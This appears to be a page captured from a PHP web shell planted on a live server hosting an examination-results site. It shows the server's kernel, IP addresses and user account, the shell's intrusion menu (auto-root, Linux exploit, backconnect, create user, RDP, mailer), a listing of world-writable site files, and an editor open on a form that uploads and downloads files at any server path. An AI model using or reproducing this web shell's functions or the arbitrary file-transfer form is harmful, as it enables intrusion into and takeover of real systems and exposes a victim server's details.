Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.15.191.241
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
results /
jssum /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
PrinChallan.php
805
B
-rwxrwxrwx
Thumbs.db
19
KB
-rwxrwxrwx
applicationFormReport.php
10.09
KB
-rwxrwxrwx
applicationFormReportNEFT.php
10.86
KB
-rwxrwxrwx
applicationFormReportPOSTOFFIC...
12.4
KB
-rwxrwxrwx
applicationFormReportSBM.php
10.78
KB
-rwxrwxrwx
cappcontext.php
2.64
KB
-rwxrwxrwx
cappdu.php
4.09
KB
-rwxrwxrwx
code39.php
6.38
KB
-rwxrwxrwx
coutput.php
1.75
KB
-rwxrwxrwx
crequestbroker.php
2.49
KB
-rwxrwxrwx
csessions.php
516
B
-rwxrwxrwx
cuser.php
3.41
KB
-rwxrwxrwx
customappcontext.php
2.34
KB
-rwxrwxrwx
download_upload.html
3.64
KB
-rwxrwxrwx
getnumword.php
7.15
KB
-rwxrwxrwx
json.php
33.22
KB
-rwxrwxrwx
mregistry.php
1.5
KB
-rwxrwxrwx
process_payment.php
3.64
KB
-rwxrwxrwx
results.php
86.3
KB
-rwxrwxrwx
results23042016.php
34.08
KB
-rwxrwxrwx
results_18082017.php
81.31
KB
-rwxrwxrwx
results_arun.php
81.3
KB
-rwxrwxrwx
revaluation.php
23.7
KB
-rwxrwxrwx
revaluation_03012014.php
21.53
KB
-rwxrwxrwx
revaluation_03042015.php
21.61
KB
-rwxrwxrwx
revaluation_07022015.php
21.52
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : download_upload.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <link rel="shortcut icon" type="image/jpg" href="img/favicon.jpg" /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Examination Results</title> <link rel="stylesheet" type="text/css" href="css/basic.css" /> <!-- <link rel="stylesheet" type="text/css" href="css/jquery-ui-1.7.2.custom.css" /> --> <script type="text/javascript" src="../js/jquery-1.8.3.js"></script> <script type="text/javascript" src="../js/jquery.corner.js"></script> <script type="text/javascript" src="../js/jscript.js"></script> <script type="text/javascript" src="../js/curve-min.js"></script> <link rel="stylesheet" href="jquery-ui-1.9/themes/base/jquery.ui.all.css"> <script src="../jquery-ui-1.9/external/jquery.bgiframe-2.1.2.js"></script> <script src="../jquery-ui-1.9/ui/jquery.ui.core.js"></script> <script src="../jquery-ui-1.9/ui/jquery.ui.widget.js"></script> <script src="../jquery-ui-1.9/ui/jquery.ui.dialog.js"></script> <script src="../jquery-ui-1.9/ui/jquery.ui.menu.js"></script> <script src="../jquery-ui-1.9/ui/jquery.ui.tabs.js"></script> <script type="text/javascript"> </script> </head> <div class='ui-tabs ui-widget ui-widget-content ui-corner-all' align='center' style='padding-top:2px; height:150px;'> <div class='ui-widget-header ui-corner-all sub-tab-header' align='left' style='font-size:1.4em;height:15px;padding:2px;'> Download</div> <div align="center" style="padding-top:15px"> <table id ="tbl_menu" class="content-tbl" align="center" cellpadding="2" cellspacing="0" border="0" style="width:47%"> <tr> <td align='right'><font color="red">* </font>Path:</td> <td><input type="text" id="download_upload_path" style='width:190px;' name="download_upload_path"/> </td> </tr> <tr> <td> </td> <td> <a href="#" id='download' class='anchor-header-footer' onclick='downloadFileFromServer()' style="color:#2B65EC; font-family:Verdana,Arial,Helvetica,sans-serif; font-size:11px; font-weight:bold;cursor:pointer;text-decoration: none;">Download</a> </td> </tr> </table> </div> </div> <div class='ui-tabs ui-widget ui-widget-content ui-corner-all' align='center' style='padding-top:2px; height:150px;'> <div class='ui-widget-header ui-corner-all sub-tab-header' align='left' style='font-size:1.4em;height:15px;padding:2px;'> Upload</div> <form id='form_upload_download_details' enctype='multipart/form-data' method='POST'> <div align="center" id="upload_details" style="padding-top:15px"> <input type='hidden' name= 'MAX_FILE_SIZE' value='10000000000' /> <table id ="tbl_menu" class="content-tbl" align="center" cellpadding="2" cellspacing="0" border="0" style="width:60%"> <tr> <td align='right'>File Name:</td> <td><input type="file" style='height:23px' id="upload_to_server_file_name" style='width:190px;' name="upload_to_server_file_name"/> </td> </tr> <tr> <td align='right'><font color="red">* </font>File Path:</td> <td><input type="text" id="download_upload_file_path" style='width:190px;' name="download_upload_file_path"/> </td> </tr> <tr> <td> </td> <td> <a href="#" id='upload' onclick='UploadFileToServer()' style="color:#2B65EC; font-family:Verdana,Arial,Helvetica,sans-serif; font-size:11px; font-weight:bold;cursor:pointer;text-decoration: none;">Upload</a> </td> </tr> </table> </form> </div> </div> </body> </html>
Close